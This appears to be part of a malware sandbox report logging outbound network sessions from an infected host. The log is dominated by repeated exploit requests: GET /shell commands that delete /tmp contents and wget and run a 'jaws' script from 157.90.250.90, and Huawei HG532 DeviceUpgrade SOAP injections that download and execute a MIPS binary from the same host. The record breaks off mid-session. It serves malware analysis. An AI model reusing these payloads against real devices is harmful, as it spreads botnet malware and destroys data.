                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.2344588186.244.224.180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.555691004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.235283683.119.82.14680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.556354046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.234826870.167.174.22480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.557034016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.2337904208.170.5.22280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.557694912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.233712452.147.152.23180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.558460951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.2355606138.128.101.13580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.559104919 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.2352870156.126.99.23937215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.667560101 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.2359800111.131.4.8780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.728585005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.2358206146.239.100.8480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.729506016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.234992273.123.193.3980
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.730252028 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.2345042155.207.215.1180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.731055021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.2357504186.44.230.5180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.731787920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.233818841.7.124.2537215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.668894053 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.2356452197.193.108.12037215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.669842005 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.2353450197.166.40.13337215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.670569897 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.2357304197.132.62.11937215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.671344042 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.2339548156.81.76.1037215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.672044039 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.2342194197.26.74.23737215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.672730923 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.233337041.30.218.20737215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.673397064 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.2339518156.170.127.6937215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:50.674081087 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
